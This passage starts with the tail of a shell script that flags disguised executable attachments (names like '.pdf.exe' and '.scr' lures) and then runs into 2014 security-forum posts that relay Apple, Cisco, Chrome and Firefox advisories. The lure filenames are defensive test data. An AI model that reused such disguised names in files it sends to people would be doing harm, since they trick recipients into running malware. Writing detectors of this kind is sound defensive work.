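    # Reads member names, one per line (for example from "unzip -Z1 file.zip"),
    # and prints the most severe verdict found inside the archive.
    worst=OK
    while IFS= read -r member; do
        v=$(attachment_verdict "$member")
        case "$v" in
            EXEC-DISGUISED) worst=EXEC-DISGUISED ;;
            EXEC)    [ "$worst" = EXEC-DISGUISED ] || worst=EXEC ;;
            ARCHIVE) [ "$worst" = OK ] && worst=ARCHIVE ;;
        esac
    done
    echo "$worst"
}

# Stand-alone run over names constructed from the posts above.
for n in 'bill_com_payment_details_ID0000012773616632715381235.pdf.exe' \
         'document7698124-86421_pdf.scr' 'BCA Banking 24.09.14.pdf.exe' \
         'voicemessage.scr' 'PaymentReceipt262.zip' 'quarterly_report.pdf'; do
    printf '%-64s %s\n' "$n" "$(attachment_verdict "$n")"
done
printf 'ZIP wrapping document26092014-008_pdf.exe: %s\n' \
    "$(printf '%s\n' 'readme.txt' 'document26092014-008_pdf.exe' | archive_worst_verdict)"
```

The verdict is a naming heuristic only; it complements, not replaces, opening the archive and hashing the binary, and it says nothing about the content-type or icon tricks the posts also mention.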

 87 
 on: September 25, 2014, 02:25:24  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

iOS 8.0.1 revoked - iPhone 6, 6+
- http://www.theinquirer.net/inquirer/news/2372128/apple-yanks-ios-801-after-update-borks-iphone-connectivity-touch-id
Sep 25, 2014 - "... iPhone 6 and iPhone 6 Plus users that downloaded the iOS 8.0.1 update and found that it somewhat ruined their days to roll back the update*. Apple released iOS 8.0.1 to iPhones on Wednesday, but all didn't go to plan. While speculation had suggested that the update would arrive with a slew of bug fixes, the update appears to have created more issues. Apple has accepted that some iPhone users have experienced loss of connectivity and breakage in Touch ID sign-in..."
* http://support.apple.com/kb/HT6487
Sep 25, 2014
___

- http://support.apple.com/kb/HT6487
Last Modified: Sep 26, 2014 - "iOS 8.0.2 is available now. It fixes the loss of cellular service and use of Touch ID that may have affected you if you have an iPhone 6 or iPhone 6 Plus and you downloaded iOS 8.0.1. It includes improvements and bug fixes originally in iOS 8.0.1. We apologize for inconveniencing you if you were affected by the bug in iOS 8.0.1. To resolve this issue, update your device to iOS 8.0.2* or later."
* http://support.apple.com/kb/HT4623

- https://discussions.apple.com/search.jspa?facet=content&type=discussion&sort=relevanceDesc&showAnsweredFirst=true&q=iOS%208.0.2%20problems
___

APPLE-SA-2014-09-23-1 OS X: Flash Player plug-in blocked
- https://lists.apple.com/archives/security-announce/2014/Sep/msg00000.html
Sep 23, 2014
Due to security issues in older versions, Apple has updated the web plug-in blocking mechanism to disable all versions prior to Flash Player 15.0.0.152 and 13.0.0.244.

Information on blocked web plug-ins will be posted to:
- http://support.apple.com/kb/HT5655
Last Modified: Sep 24, 2014


 88 
 on: September 25, 2014, 00:18:37  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

- http://tools.cisco.com/security/center/publicationListing.x

Cisco IOS Software NAT DoS vuln
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-nat
2014 Sep 24 - "Summary: A vulnerability in the Network Address Translation (NAT) feature of Cisco IOS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper translation of IP version 4 (IPv4) packets. Cisco has released free software updates that address this vulnerability..."
- http://www.securitytracker.com/id/1030896
CVE Reference: CVE-2014-3361
Sep 24 2014
Impact: Denial of service via network
Fix Available: Yes Vendor Confirmed: Yes...

Cisco IOS Software SIP DoS vuln
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-sip
2014 Sep 24 - "Summary: A vulnerability in the Session Initiation Protocol (SIP) implementation in Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device. To exploit this vulnerability, affected devices must be configured to process SIP messages. Cisco has released free software updates that address this vulnerability. There are no workarounds for devices that must run SIP; however, mitigations are available to limit exposure to this vulnerability..."
- http://www.securitytracker.com/id/1030897
CVE Reference: CVE-2014-3360
Sep 24 2014
Impact: Denial of service via network
Fix Available: Yes Vendor Confirmed: Yes...

Cisco IOS Software mDNS - multiple vulns
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-mdns
2014 Sep 24 - "Summary: The Cisco IOS Software implementation of the multicast Domain Name System (mDNS) feature contains the following vulnerabilities when processing mDNS packets that could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition:
- Cisco IOS Software mDNS Gateway Memory Leak Vulnerability
- Cisco IOS Software mDNS Gateway Denial of Service Vulnerability
Cisco has released free software updates that address these vulnerabilities..."
- http://www.securitytracker.com/id/1030898
CVE Reference: CVE-2014-3357, CVE-2014-3358
Sep 24 2014
Impact: Denial of service via network
Fix Available: Yes Vendor Confirmed: Yes...

Cisco IOS Software Metadata vulns
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-metadata
2014 Sep 24 - "Summary: Two vulnerabilities in the metadata flow feature of Cisco IOS Software could allow an unauthenticated, remote attacker to reload a vulnerable device. The vulnerabilities are due to improper handling of transit RSVP packets that need to be processed by the metadata infrastructure. An attacker could exploit these vulnerabilities by sending malformed RSVP packets to an affected device. A successful exploit could allow the attacker to cause an extended denial of service (DoS) condition. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are not available..."
- http://www.securitytracker.com/id/1030894
CVE Reference: CVE-2014-3355, CVE-2014-3356
Sep 24 2014
Impact: Denial of service via network
Fix Available: Yes Vendor Confirmed: Yes...

Cisco IOS Software RSVP vuln
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-rsvp
2014 Sep 24 - "Summary: A vulnerability in the implementation of the Resource Reservation Protocol (RSVP) in Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause the device to reload. This vulnerability could be exploited repeatedly to cause an extended denial of service (DoS) condition. Cisco has released free software updates that address this vulnerability. A workaround that mitigates this vulnerability is available..."
- http://www.securitytracker.com/id/1030893
CVE Reference: CVE-2014-3354
Sep 24 2014
Impact: Denial of service via network
Fix Available: Yes Vendor Confirmed: Yes...

Cisco IOS Software DHCPv6 DoS vuln
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-dhcpv6
2014 Sep 24 - "Summary: A vulnerability in the DHCP version 6 (DHCPv6) server implementation of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. The vulnerability is due to improper parsing of malformed DHCPv6 packets. An attacker could exploit this vulnerability by sending malformed DHCPv6 packets to be processed by an affected device. An exploit could allow the attacker to cause a memory leak and eventual reload of an affected device. Cisco has released free software updates that address this vulnerability..."
- http://www.securitytracker.com/id/1030895
CVE Reference: CVE-2014-3359
Sep 24 2014
Impact: Denial of service via network
Fix Available: Yes Vendor Confirmed: Yes...


 89 
 on: September 24, 2014, 15:29:02  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Chrome 37.0.2062.124 released
- http://googlechromereleases.blogspot.com/2014/09/stable-channel-update_24.html
Sep 24, 2014 - "The stable channel has been updated to 37.0.2062.124 for Windows and Mac.
This build contains a security change:
[414124] RSA signature malleability in NSS (CVE-2014-1568)..."

> https://www.us-cert.gov/ncas/current-activity/2014/09/24/Mozilla-Network-Security-Services-NSS-Library-Vulnerability
Sep 24, 2014

- http://www.kb.cert.org/vuls/id/772676
24 Sep 2014 - "... This vulnerability may allow an attacker to forge an RSA signature, such as an SSL certificate..."

- http://www.securitytracker.com/id/1030900
CVE Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1568 - 7.5 (HIGH)
Sep 24 2014
Impact: Disclosure of system information, Disclosure of user information, Modification of authentication information, Modification of system information, Modification of user information
Fix Available: Yes Vendor Confirmed: Yes  
Version(s): prior to 37.0.2062.124 ...


 90 
 on: September 24, 2014, 15:14:06  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Firefox 32.0.3 released

From an admin. account, start Firefox, then >Help >About >Check for Updates ...
-or-
Download: https://www.mozilla.com/firefox/all.html

Release notes
- https://www.mozilla.org/en-US/firefox/32.0.3/releasenotes/
September 24, 2014
Fixed: 32.0.3: New security fixes can be found here*
* https://www.mozilla.org/security/known-vulnerabilities/firefox.html#firefox32.0.3
MFSA 2014-73 RSA Signature Forgery in NSS
> https://www.mozilla.org/security/announce/2014/mfsa2014-73.html

> https://www.us-cert.gov/ncas/current-activity/2014/09/24/Mozilla-Network-Security-Services-NSS-Library-Vulnerability
Sep 24, 2014

- http://www.kb.cert.org/vuls/id/772676
24 Sep 2014 - "... This vulnerability may allow an attacker to forge an RSA signature, such as an SSL certificate..."

- http://www.securitytracker.com/id/1030901
CVE Reference: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1568 - 7.5 (HIGH)
Sep 24 2014
Impact: Disclosure of system information, Disclosure of user information, Modification of authentication information, Modification of system information, Modification of user information
Fix Available: Yes Vendor Confirmed: Yes  
Version(s): prior to versions ESR 24.8.1, ESR 31.1.1, 32.0.3 ...
